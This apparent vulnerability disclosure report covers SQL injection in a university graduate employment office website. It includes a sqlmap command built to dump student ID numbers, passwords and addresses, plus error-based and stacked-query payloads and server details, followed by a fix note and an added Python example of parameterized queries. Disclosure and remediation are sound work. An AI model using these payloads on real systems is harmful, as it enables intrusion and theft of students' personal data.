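2015-11-23: Details reported to the vendor; awaiting vendor response.
2015-11-28: The vendor chose to ignore the vulnerability; details disclosed to the public.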
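Duties and job responsibilities of the Graduate Employment Guidance Office
1. Implement the relevant regulations and policies of the Ministry of Education and the Shanghai Municipal College Graduate Employment Guidance Office, and, in line with the school's educational policy, draw up the school's graduate employment work plan and specific implementation measures.
2. Review the qualifications of the school's graduates, and promptly report graduate resource information and employment plans to the Municipal College Graduate Employment Guidance Center.
3. Provide graduate education and employment guidance: train counselors, organize lectures on employment policy, employment information and job-hunting skills, and provide guidance and consultation for graduate employment work.
4. Receive and handle visits and letters from students, parents and employers, collect employers' hiring needs, and publish them to graduates promptly.
5. Accept commissions from employers to recommend graduates, and notify graduates of first-round tests, second-round tests, hiring decisions and related matters.
6. Verify and register student employment agreements.
7. Recommend graduates from outside Shanghai for employment in Shanghai according to policy, and review the materials of non-Shanghai graduates applying to work in Shanghai.
8. Assist with issuing graduates' registration certificates and with the related school-leaving procedures.
9. Conduct follow-up surveys of graduates, collect employer feedback, and write research reports.
10. Handle breaches of contract, re-signing of agreements and outstanding issues that arise during graduate employment.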
Address: http://**.**.**.**
$ python sqlmap.py -u "http://**.**.**.**" -p ClassID --technique=ES --form --random-agent --batch --hex -D SJQCCenterOfCareer -T dbo.Student -C 考生号,身份证,姓名,密码,家庭地址,联系电话,联系地址 --dump --start 1 --stop 5
Database: SJQCCenterOfCareer
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Student | 21916   |
+-------------+---------+
A small sample is shown:
---
Parameter: ClassID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user: 'center'
current user is DBA: True
database management system users [6]:
[*] center
[*] G&M&sys
[*] IJcenter
[*] JIANQIAO-F9F629\Administrator
[*] jobdateshare
[*] sa
Add input filtering.
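The fix above concerns the injectable ClassID POST parameter. The following is an added example, not code from the report or the affected site, showing an allow-list check combined with a bound parameter, so the value quoted in the sqlmap output is handled as data. The table name, sample rows and numeric ClassID format are assumptions, and SQLite stands in for the SQL Server back end.

```python
import re
import sqlite3

# Assumption: ClassID is a short numeric category id (its real format is not on the page).
CLASS_ID_RE = re.compile(r"[0-9]{1,9}")

# Parameter value quoted from the sqlmap output above (stacked-queries test).
PAGE_PAYLOAD = "TFuz';WAITFOR DELAY '0:0:5'--"


def make_db():
    """In-memory SQLite stand-in for the back end; table and rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Information (ClassID TEXT, Title TEXT)")
    db.executemany(
        "INSERT INTO Information VALUES (?, ?)",
        [("12", "Campus job fair"), ("12", "Resume workshop"), ("30", "Policy notice")],
    )
    return db


def build_query_unsafe(class_id):
    """Vulnerable pattern: the request value is pasted into the SQL text.
    Only builds the string so it can be inspected; it is never executed."""
    return "SELECT Title FROM Information WHERE ClassID = '" + class_id + "'"


def search_bound(db, class_id):
    """Bound parameter: the driver passes the value as data, never as SQL."""
    cur = db.execute(
        "SELECT Title FROM Information WHERE ClassID = ? ORDER BY Title", (class_id,)
    )
    return [row[0] for row in cur.fetchall()]


def search_safe(db, class_id):
    """Allow-list validation first (the filtering), then the bound query."""
    if not CLASS_ID_RE.fullmatch(class_id):
        raise ValueError("invalid ClassID")
    return search_bound(db, class_id)


if __name__ == "__main__":
    db = make_db()
    print(build_query_unsafe(PAGE_PAYLOAD))  # the quote closes the literal early
    print(search_bound(db, PAGE_PAYLOAD))    # no row has that literal ClassID
    print(search_safe(db, "12"))
```

Separately from the query fix, the output above reports `current user is DBA: True`; an application login limited to the rights it needs on its own database narrows what any remaining injection can reach.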
Severity: no impact (ignored by vendor)
Ignored at: 2015-11-28 10:54
None yet